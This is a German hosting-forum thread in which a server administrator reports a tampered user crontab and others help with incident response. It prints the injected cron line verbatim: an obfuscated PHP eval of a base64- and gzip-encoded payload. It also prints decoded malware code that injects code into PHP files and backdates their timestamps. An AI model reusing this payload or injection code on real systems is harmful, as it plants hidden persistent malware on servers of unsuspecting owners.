Cronjob Datei war manipuliert

For topics beyond KeyHelp. / Für Themen jenseits von KeyHelp.
Post Reply
RR_Tappi

Cronjob Datei war manipuliert

Post by RR_Tappi »

Hallo,
da ich vom angelegten Cronjob e-Mails auf Grund eines Fehlers bekam, bin ich der Sache natürlich umgehend nachgegangen.
Das ganze fing heute morgen gegen 5 Uhr an.

im Verezichnis var/spool/cron/crontabs liegt ja die Datei für den bzw. die Cronjobs und da habe ich gesehen das diese heute morgen um 4:47 Uhr bearbeitet wurde.

Der ursprüngliche Inhalt sah so aus:

Code: Select all

# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (- installed on Mon Feb 24 04:47:05 2025)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
#
# This config was generated by KeyHelp on 2025-02-04 02:10:06.
# System user: retterradio
#
SHELL=/bin/bash
TMPDIR=/home/users/retterradio/tmp/
# Radiostatistik
MAILTO="sendeleitung@retter-radio.de"
*/15 * * * * /opt/keyhelp/php/7.4/bin/php /home/users/retterradio/www/webseiten/radioseite/streamquery.php > /dev/null
# Radio-Songhistorie
MAILTO=""
*/5 * * * * /opt/keyhelp/php/7.4/bin/php /home/users/retterradio/www/webseiten/radioseite/stream_songhistorie.php
* * * * * /usr/bin/php -r 'eval(gzinflate(base64_decode("jVL7b9owEP6dvyKTkAJaNeVRoNVUbYzyHCEtlGCYJuQ4DjFxnDRxIDD1f5/Duw9ps+T4HN/33d13V4i8qBEy14KUOJDjkjx9ChWT8chc1mtoG+rGMiR9zVvZk/HKAQOKmLFCgaU4bWuDgpYPJzcrR3f0vu7QKRtQCIbUJre6rfd81OlRpBvivc7hpLK0O5Y/A+LetjhqZ57THqeo7a27yzxeM49XMe9D4gaWNp1kNqDrELQrCFHlGTS8/O6DUYR6rVv7caRCABLNtTgGLe78pJk9USuop66J8LFBw0Fdqnat1vARbBdr476pPT5Zx/+CK3NyLpDjG1Tg19FEva6BUVhzmUFMza8aS741l8bGJL36DMw8u7HwgTpojelM7ISNWsPxuHVzbdzXs4HfVHuqEpmbbg0+hVtTN6rGFlW7rIJBx3ieMSud6sPI1kQ9G85mYOgijaYzLaNAF5qBH8lUaOcGCjF15U4ufy24KUOchEx626ViguOy9KdQkMSiJOFSqeimlD5A7l1JxWSTcBw02UrYKHSwOCLIOY5ZWbqTUibQRFBtccmGCa5ezx2cu+1pRdyctZiEaYyw8HcJxfMF5nMUMo4ZT86xDr7ElUpRjBfzAHLklV7F39OU82ylw4oxT2O2h76cCD5dMhzSPeGFsXvByT+Y9rkThsI4xogP8QJnooaEx/MYRxQiMeJYlr5I8gruDipfSfL3bzCOd1e4kS8FPIrB8Hp01GOX55HsTSjBJZ+L/gB8mcixpF/K70OjRAYPnYd50+wL6/XzieTAev68E+9S/jPsf3TLWx1wEhzbvrMv2i19llRlD0sZJcx/Nwq7YYnSj4blgyJ4mOYJX3icogqPl8Jf")));'
Mir kam das gleich spanisch vor mit diesem base64 da drin. Ich habe also beide Cronjobs gelöscht und neu angelegt und siehe da, jetzt sieht es so aus:

# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (/tmp/keyhelp/CronTab-67bc60e53ace21.46437900 installed on Mon Feb 24 13:07:01 2025)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
#
# This config was generated by KeyHelp on 2025-02-24 13:07:01.
# System user: retterradio
#

SHELL=/bin/bash
TMPDIR=/home/users/retterradio/tmp/

# Radio-Hörerstatistik
*/15 * * * * /opt/keyhelp/php/7.4/bin/php /home/users/retterradio/www/webseiten/radioseite/streamquery.php > /dev/null

# Radio-Songhistorie
*/5 * * * * /opt/keyhelp/php/7.4/bin/php /home/users/retterradio/www/webseiten/radioseite/stream_songhistorie.php > /dev/null 
Irgendwas oder Irgendjemand hat also die Datei heute morgen um 4:47 Uhr bearbeitet.

Frage: Kann es durch KeyHelp passiert sein?

Oder ist jemand in den Server eingedrungen
Ich bin Ostwestfale: STUR . HARTNÄCKIG . KÄMPFERISCH
Florian
Keyweb AG

Re: Cronjob Datei war manipuliert

Post by Florian »

Hallo,

ja da kannst du davon ausgehen dass jemand über Websoftware mit Lücken das Zeug eingeschleust hat.

Ich würde auch mal die Webordner nach auffälligen Dateien prüfen und ob merkwürdige Prozesse auf dem Server laufen.

Solche Cronjobs dienen meist dazu, die Schadsoftware nachzuladen für den Fall, dass Sie gelöscht wird.
Mit freundlichen Grüßen / Best regards
Florian Cheno

Keyweb AG - Die Hosting Marke
Neuwerkstr. 45/46, 99084 Erfurt / Germany
http://www.keyweb.de - http://www.keyhelp.de
RR_Tappi

Post by RR_Tappi »

Hallo Florian,

ok danke dir
Ich bin Ostwestfale: STUR . HARTNÄCKIG . KÄMPFERISCH
24unix

Post by 24unix »

Das ist ziemlich übel.

Das ist der eingeschleuste Code:

function phpConfValidate($ser) {

list ($fullPath, $systemEnv, $code, $pattern) = unserialize(base64_decode($ser));
    $source = file_get_contents($fullPath);
    if (preg_match($systemEnv, $source)) {
        return;
    }
    if (!preg_match($pattern, $source, $matches)) {
        return;
    }

$incorrectRegex = str_replace('e' . 'va' . 'l', '@?arr' . 'ay', $systemEnv);
    $newSource = preg_replace($incorrectRegex, '', $source);
    $newSource = str_replace($matches[0], $code . PHP_EOL . $matches[0], $newSource);

if (!preg_match($systemEnv, $newSource)) {
        return;
    }

$filemtime = filemtime($fullPath) + 10;
    unlink($fullPath);
    file_put_contents($fullPath, $newSource);
    touch($fullPath, $filemtime);
}
Das Fazit von ChatGPT:

This is a serious security breach. If this script has run on your system, assume full compromise. You might need to restore from backups or completely reinstall the system to be sure it’s clean.

Füttere mal ChatGPT mit dem Code, der haut Dir 2-3 Seiten raus, mit Erklärung, und gegenmaßnahmen.
Cheers Micha
--
A Windows user reinstalls software every few weeks.
A Linux user reinstalls software every few weeks.
The difference is with Linux the version numbers change.
Ralph

Post by Ralph »

Schau dir mal mal in den Event logs die Logins des users retterradio an ...
Vermutlich wurden die Login Details irgendwo abgefischt ... sehr wahrscheinlich aus einer Email mit Logindaten die der User in seinem Postfach aufbewahrt hat. Als erstes würde ich das PW für retterradio neu generieren "OHNE" dem User den neuen Login zu senden, eventl noch 2FA aktivieren.
Dann musst du mit dem User abklären ob der seine Login Mails in Mailboxen aufhebt und vor allem ob diese Mailbox eventl. gehackt wurde.
Die Zieladresse des Users kannst du auch mal hier überprüfen:
https://haveibeenpwned.com/
Erst neue Logins senden wenn das PW der Ziel Emailadresse in ein neues sicheres geändert wurde und der User sollte 2FA aktivieren.

Wenn KEINE Logins für den User "retterradio" auffindbar sind, ist es möglich dass jemand Zugriff auf das komplette System hat.
Die Admin logins sind ebenfalls in den Event logs einsehbar ... auch wann ein Cronjob über das Panel geändert wurde.
Login Emails (egal welche) NIEMALS in Mailboxen aufbewahren, und beim löschen auch den Papierkorb leeren.

Falls nichts zu finden ist, wurde der der cron job via SSH geändert ... das wäre dann sehr übel.
Jolinar
Community Moderator

Post by Jolinar »

Ralph wrote: Mon 24. Feb 2025, 18:27 Wenn KEINE Logins für den User "retterradio" auffindbar sind, ist es möglich dass jemand Zugriff auf das komplette System hat.
Wenn in der Crontab geändert wurde, kannst du sogar ziemlich sicher davon ausgehen, daß das komplette System kompromittiert ist.
Ein Refreseh von Zugangsdaten dürfte in diesem Fall nicht ausreichend sein. Hier sollte tatsächlich ein Neuaufsetzen des Systems mit aktueller Software und nachfolgend dem Einspielen der Nutzerdaten aus dem letzten Backup das Mittel der Wahl sein.
Ein Image des bestehenden Systems sollte wenn möglich vorher auch noch angelegt werden, um es einer nähergehenden forensischen Analyse auf Schwachstellen zu unterziehen.
Wenn jemand inkompetent ist, dann kann er nicht wissen, daß er inkompetent ist. (David Dunning)

Data Collector für Community Support
___
Ich verwende zwei verschiedene Schriftfarben in meinen Beiträgen /
I use two different font colors in my posts:
  • In dieser Farbe schreibe ich als Moderator und gebe moderative Hinweise oder begründe moderative Eingriffe /
    In this color, I write as a moderator and provide moderative guidance or justify moderative interventions
  • In dieser Farbe schreibe ich als Community Mitglied und teile meine private Meinung und persönlichen Ansichten mit /
    In this color, I write as a community member and share my personal opinions and views
Ralph

Post by Ralph »

Jolinar wrote: Mon 24. Feb 2025, 18:45 Wenn in der Crontab geändert wurde, kannst du sogar ziemlich sicher davon ausgehen, daß das komplette System kompromittiert ist.
Nicht zwingend, da es sich hierbei um einen User cron job handelt ... sollte sich dann in Grenzen halten (user docroot) ...
allerdings wenn es einen KH Admin Login dazu gibt, dann ist mit Sicherheit davon auszugehen.
In dem Fall hätte der Angreifer aber eher einen root cron job bevorzugt :roll:
Jolinar
Community Moderator

Post by Jolinar »

Ralph wrote: Mon 24. Feb 2025, 19:00 Nicht zwingend, da es sich hierbei um einen User cron job handelt
Da kannst du natürlich recht haben.

Ralph wrote: Mon 24. Feb 2025, 19:00 In dem Fall hätte der Angreifer aber eher einen root cron job bevorzugt
Nicht unbedingt...ein modifizierter root Cron fällt vermutlich eher auf als ein modifizierter user Cron.

Aber das ist nur spekulativ, die weitere Vorgehensweise muß root entscheiden.
Wenn jemand inkompetent ist, dann kann er nicht wissen, daß er inkompetent ist. (David Dunning)

Data Collector für Community Support
___
Ich verwende zwei verschiedene Schriftfarben in meinen Beiträgen /
I use two different font colors in my posts:
  • In dieser Farbe schreibe ich als Moderator und gebe moderative Hinweise oder begründe moderative Eingriffe /
    In this color, I write as a moderator and provide moderative guidance or justify moderative interventions
  • In dieser Farbe schreibe ich als Community Mitglied und teile meine private Meinung und persönlichen Ansichten mit /
    In this color, I write as a community member and share my personal opinions and views
24unix

Post by 24unix »

Jolinar wrote: Mon 24. Feb 2025, 19:08 Nicht unbedingt...ein modifizierter root Cron fällt vermutlich eher auf als ein modifizierter user Cron.
Aber im User-Cron brauchst Du eine privilege escalation, im system cron bekommt Du die frei Haus …
Cheers Micha
--
A Windows user reinstalls software every few weeks.
A Linux user reinstalls software every few weeks.
The difference is with Linux the version numbers change.
Florian
Keyweb AG

Post by Florian »

Hallo,

also aus meiner langjährigen Erfahrung beschränken sich solche Sachen auf den User. Das heißt das Zeug wurde per Web eingeschleust und auch der User Cronjob nur geändert. Auf root Ebene ist die Kompromittierung eher selten. man muss es aber natürlich genau prüfen.
Mit freundlichen Grüßen / Best regards
Florian Cheno

Keyweb AG - Die Hosting Marke
Neuwerkstr. 45/46, 99084 Erfurt / Germany
http://www.keyweb.de - http://www.keyhelp.de
Post Reply